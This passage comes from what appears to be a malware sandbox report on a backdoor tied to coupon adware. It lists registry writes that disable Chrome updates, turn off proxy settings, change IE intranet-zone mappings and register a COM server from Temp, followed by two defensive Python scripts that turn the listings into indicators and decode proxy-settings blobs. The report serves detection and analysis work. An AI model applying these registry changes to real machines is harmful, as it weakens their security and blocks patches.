A value of 1 for each of these three ZoneMap entries is Internet Explorer's default Local Intranet configuration, so these writes re-assert the defaults and do not by themselves widen the zone; the proxy-related changes (ProxyEnable = 0 here and the proxy values deleted below) are what alter how the browser connects.
The Backdoor deletes the following registry key(s):
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
The Backdoor deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:1176 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Policies\Google\Update]
"Update{8A69D345-D564-463C-AFF1-A69D9E530F96}" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F679D2F0-CE91-93C8-BD2D-062DF04DA0C1}]
"SilentUninstall" = "%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.exe /s /n /i:ExecuteCommands;UninstallCommands"
[HKLM\SOFTWARE\Policies\Google\Update]
"AutoUpdateCheckPeriodMinutes" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}]
"ap" = "-dev-multi-chrome"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"ap" = "2.0-dev-multi-chrome"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F679D2F0-CE91-93C8-BD2D-062DF04DA0C1}]
"DisplayIcon" = "%System%\msiexec.exe"
"CategoryName" = "Apps"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F679D2F0-CE91-93C8-BD2D-062DF04DA0C1}]
"ProductName" = "WWhiteCouPooni"
[HKLM\SOFTWARE\Policies\Google\Update]
"DisableAutoUpdateChecksCheckboxValue" = "1"
"UpdateDefault" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F679D2F0-CE91-93C8-BD2D-062DF04DA0C1}]
"NoRepair" = "1"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F679D2F0-CE91-93C8-BD2D-062DF04DA0C1}]
"InstallDate" = "20150509"
"NoModify" = "1"
"UninstallString" = "%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.exe /s /n /i:ExecuteCommands;UninstallCommands"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Setup\6.0]
"DoNotOfferIE6" = "1"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DD 3B 87 11 89 AB 78 A3 A9 D1 7F 07 27 F9 62 4E"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Setup\6.0]
"DoNotOfferIE6AU" = "1"
"DoNotAllowIE6" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\0\win32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F679D2F0-CE91-93C8-BD2D-062DF04DA0C1}]
"DisplayName" = "WWhiteCouPooni"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"
[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"
The Backdoor modifies IE security-zone settings so that the Local Intranet zone includes all network (UNC) paths:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
Proxy settings are disabled, so the browser connects directly:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Backdoor modifies IE security-zone settings so that the Local Intranet zone includes all local (intranet) sites that are not listed in other zones:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Backdoor modifies IE security-zone settings so that the Local Intranet zone includes all sites that bypass the proxy server:
"ProxyBypass" = "1"
The Backdoor deletes the following registry key(s):
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Programmable]
The Backdoor deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
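The registry listings above are long but have a fixed shape (a bracketed key line followed by "name" = "value" lines), so they can be turned into indicators mechanically. The Python below is an added example written for this page, not code from the report or from the analysed sample. It parses lines in that shape and applies a handful of heuristics matching what the listings show: an Uninstall entry whose UninstallString runs rundll32 on a DLL outside %System% (the TailCutter entry), an Uninstall entry that borrows msiexec.exe as its DisplayIcon (the WWhiteCouPooni entry), Google Update policy values that switch Chrome's automatic updates off (UpdateDefault = 0, AutoUpdateCheckPeriodMinutes = 0), ProxyEnable = 0, and a COM LocalServer32 registered from a Temp directory or the root of a drive. The rule names, the msiexec-icon heuristic and the sample excerpt are constructed for the example; the excerpt's lines are copied from the listings above.

```python
import re

# Shape of the report's registry listing: "[key]" lines followed by
# "name" = "value" lines. Prose sentences in between match neither pattern.
KEY_RE = re.compile(r'^\[(?P<key>[^\]]+)\]$')
VALUE_RE = re.compile(r'^"(?P<name>[^"]*)"\s*=\s*"(?P<value>.*)"$')

# Excerpt copied from the listings on this page (constructed test input).
SAMPLE_REPORT = r"""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{c6d15ff2}]
"UninstallString" = "%System%\RUNDLL32.EXE C:\PROGRA~1\TAILCU~1\TAILCU~1.DLL,_uninstall /un"
"InstallDate" = "20140510"
[HKLM\SOFTWARE\Policies\Google\Update]
"Update{8A69D345-D564-463C-AFF1-A69D9E530F96}" = "0"
"AutoUpdateCheckPeriodMinutes" = "0"
"UpdateDefault" = "0"
"DisableAutoUpdateChecksCheckboxValue" = "1"
The Backdoor modifies IE settings for security zones (prose line, skipped)
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F679D2F0-CE91-93C8-BD2D-062DF04DA0C1}]
"DisplayIcon" = "%System%\msiexec.exe"
"UninstallString" = "%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.exe /s /n /i:ExecuteCommands;UninstallCommands"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
"MigrateProxy" = "1"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "c:\%original file name%.exe"
"""

# Directories a legitimate rundll32 uninstall would normally load from.
SYSTEM_DIRS = ("%system%\\", "c:\\windows\\system32\\", "%windir%\\system32\\")


def parse_registry_dump(text):
    """Yield (key, name, value) triples; each value stays attached to the
    most recent [key] line. Lines of any other shape are skipped."""
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            key = m.group("key")
            continue
        m = VALUE_RE.match(line)
        if m and key is not None:
            yield key, m.group("name"), m.group("value")


def rundll32_dll_argument(cmdline):
    """Return the DLL path handed to rundll32 (lower-cased), or None when the
    command line does not invoke rundll32 or passes it nothing."""
    low = cmdline.lower()
    if "rundll32" not in low:
        return None
    after = low.split("rundll32", 1)[1]          # ".exe <dll>,<export> <args>"
    after = after.split(" ", 1)[1] if " " in after else ""
    return after.strip().split(",", 1)[0].strip() or None


def find_indicators(records):
    """Apply the heuristics to (key, name, value) triples and return hits as
    (rule, key, name, value) tuples."""
    hits = []
    for key, name, value in records:
        k, n, v = key.lower(), name.lower(), value.lower()
        if "\\currentversion\\uninstall\\" in k:
            dll = rundll32_dll_argument(v) if n in ("uninstallstring", "silentuninstall") else None
            if dll and not dll.startswith(SYSTEM_DIRS):
                hits.append(("rundll32_uninstall_nonsystem_dll", key, name, value))
            if n == "displayicon" and v.endswith("msiexec.exe"):
                hits.append(("uninstall_entry_borrows_msiexec_icon", key, name, value))
        elif k.endswith("\\policies\\google\\update"):
            updates_off = (
                (n in ("updatedefault", "autoupdatecheckperiodminutes") and v == "0")
                or (n.startswith("update{") and v == "0")
                or (n == "disableautoupdatecheckscheckboxvalue" and v == "1")
            )
            if updates_off:
                hits.append(("chrome_updates_disabled_by_policy", key, name, value))
        elif k.endswith("\\internet settings") and n == "proxyenable" and v == "0":
            hits.append(("proxy_disabled", key, name, value))
        elif ("\\classes\\clsid\\" in k and k.endswith("\\localserver32")
              and n in ("(default)", "serverexecutable")):
            # COM servers registered per-user from Temp or a drive root.
            if "\\temp\\" in v or re.match(r"^[a-z]:\\[^\\]+$", v):
                hits.append(("com_server_in_temp_or_drive_root", key, name, value))
    return hits


def summarize(hits):
    """Count hits per rule name."""
    counts = {}
    for rule, *_ in hits:
        counts[rule] = counts.get(rule, 0) + 1
    return counts


if __name__ == "__main__":
    for hit in find_indicators(parse_registry_dump(SAMPLE_REPORT)):
        print(" | ".join(hit))
```

The parser deliberately ignores the report's prose lines, so the whole "creates and/or sets" listing of a process block can be fed in unchanged; the deletion lists, which carry keys without values, produce no records and would need a separate pass.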
The process %original file name%.exe:1988 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Policies\Google\Update]
"DisableAutoUpdateChecksCheckboxValue" = "1"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37476589-E48E-439E-A706-56189E2ED4C4}]
"SilentUninstall" = "%Program Files%\ActiveCoupon\ActiveCoupon.exe /s /n /i:ExecuteCommands;UninstallCommands"
[HKLM\SOFTWARE\Policies\Google\Update]
"Update{8A69D345-D564-463C-AFF1-A69D9E530F96}" = "0"
"AutoUpdateCheckPeriodMinutes" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37476589-E48E-439E-A706-56189E2ED4C4}]
"CategoryName" = "Apps"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37476589-E48E-439E-A706-56189E2ED4C4}]
"InstallDate" = "20140222"
"Publisher" = "ActiveCoupon"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37476589-E48E-439E-A706-56189E2ED4C4}]
"UninstallString" = "%Program Files%\ActiveCoupon\ActiveCoupon.exe /s /n /i:ExecuteCommands;UninstallCommands"
"DisplayName" = "ActiveCoupon"
"NoModify" = "1"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37476589-E48E-439E-A706-56189E2ED4C4}]
"DisplayIcon" = "%System%\msiexec.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37476589-E48E-439E-A706-56189E2ED4C4}]
"NoRepair" = "1"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FA 63 AF 00 98 6D 98 39 66 CA 6D B1 37 AD 6F F1"
[HKLM\SOFTWARE\Policies\Google\Update]
"UpdateDefault" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37476589-E48E-439E-A706-56189E2ED4C4}]
"ProductName" = "ActiveCoupon"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"
[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"
The Backdoor modifies IE security-zone settings so that the Local Intranet zone includes all network (UNC) paths:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
Proxy settings are disabled, so the browser connects directly:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Backdoor modifies IE security-zone settings so that the Local Intranet zone includes all local (intranet) sites that are not listed in other zones:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Backdoor modifies IE security-zone settings so that the Local Intranet zone includes all sites that bypass the proxy server:
"ProxyBypass" = "1"
The Backdoor deletes the following registry key(s):
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Programmable]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
The Backdoor deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
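The SavedLegacySettings values written in the process blocks above (and the DefaultConnectionSettings value, which shares the layout) are the WinINet connection-settings blob: a version DWORD, a counter that WinINet increments every time it saves the settings, a flags DWORD (0x01 direct, 0x02 manual proxy, 0x04 PAC URL, 0x08 auto-detect) and then three length-prefixed strings for the proxy server, the bypass list and the PAC URL. The report prints only the first 16 bytes of each value, which is enough for the header and the first length field. The Python below is an added example for this page, not code from the report: it decodes that layout, tolerates the truncated dumps, and reads the counters, which order the writes across the blocks (0x1D for process 368 further down, 0x1E for 1176, 0x1F for 1988, and 0x23 in the block that holds the TailCutter keys). The sample labels and the full constructed blob used for the round-trip check are assumptions made for the example.

```python
import struct

# Flag bits in the third DWORD of the WinINet connection-settings blob.
PROXY_TYPE_DIRECT = 0x01
PROXY_TYPE_PROXY = 0x02
PROXY_TYPE_AUTO_PROXY_URL = 0x04
PROXY_TYPE_AUTO_DETECT = 0x08

# Hex dumps exactly as printed in this report (first 16 bytes of each value),
# labelled with the process block they appear in (labels are an assumption).
REPORT_SAMPLES = {
    "TailCutter block": "3C 00 00 00 23 00 00 00 01 00 00 00 00 00 00 00",
    "%original file name%.exe:1176": "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00",
    "%original file name%.exe:1988": "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00",
    "%original file name%.exe:368": "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00",
}


def from_report_hex(text):
    """Turn the report's space-separated hex dump into bytes."""
    return bytes(int(tok, 16) for tok in text.split())


def parse_connection_settings(blob):
    """Decode the 12-byte header and as many of the three length-prefixed
    strings as the blob actually contains; strings that are cut off or
    absent (truncated dump) are reported as None."""
    if len(blob) < 12:
        raise ValueError("blob shorter than the 12-byte header")
    version, counter, flags = struct.unpack_from("<III", blob, 0)
    info = {
        "version": version,
        "counter": counter,
        "flags": flags,
        "direct": bool(flags & PROXY_TYPE_DIRECT),
        "manual_proxy": bool(flags & PROXY_TYPE_PROXY),
        "pac_url": bool(flags & PROXY_TYPE_AUTO_PROXY_URL),
        "auto_detect": bool(flags & PROXY_TYPE_AUTO_DETECT),
    }
    offset = 12
    for field in ("proxy_server", "bypass_list", "autoconfig_url"):
        if offset + 4 > len(blob):
            info[field] = None            # dump ends before the length field
            continue
        (length,) = struct.unpack_from("<I", blob, offset)
        offset += 4
        if offset + length > len(blob):
            info[field] = None            # length present, string cut off
            offset = len(blob)
            continue
        info[field] = blob[offset:offset + length].decode("latin-1")
        offset += length
    return info


def build_connection_settings(flags, proxy_server="", bypass_list="",
                              autoconfig_url="", version=0x3C, counter=1):
    """Construct a blob in the same layout (test data, not from the report)."""
    out = struct.pack("<III", version, counter, flags)
    for s in (proxy_server, bypass_list, autoconfig_url):
        raw = s.encode("latin-1")
        out += struct.pack("<I", len(raw)) + raw
    return out + b"\x00" * 32             # trailing zero bytes; parser ignores them


def write_order(samples):
    """Order the labelled dumps by their save counter, earliest write first."""
    parsed = {label: parse_connection_settings(from_report_hex(h))
              for label, h in samples.items()}
    return sorted(parsed, key=lambda label: parsed[label]["counter"])


if __name__ == "__main__":
    for label in write_order(REPORT_SAMPLES):
        info = parse_connection_settings(from_report_hex(REPORT_SAMPLES[label]))
        print(f"{label}: counter={info['counter']} flags=0x{info['flags']:02x} "
              f"direct={info['direct']} auto_detect={info['auto_detect']}")
```

All four dumps carry flags 0x01 and a zero-length proxy-server string: a direct connection with auto-detection off, which is consistent with the ProxyEnable = 0 write and the deletion of AutoConfigURL, ProxyServer and ProxyOverride in each block. On a live host the same parser can be pointed at the full value read from the registry, in which case the bypass list and PAC URL are decoded as well.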
The process %original file name%.exe:368 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\""alpha_installer""/n]
"last" = "13075686372168"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"
[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\HELPDIR]
"(Default)" = "c:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0]
"(Default)" = "JSIELib"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "c:\%original file name%.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}]
"(Default)" = "ITinyJSObject"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"GlobalMaxTcpWindowSize" = "16777215"
[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\FLAGS]
"(Default)" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\TypeLib]
"Version" = "1.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
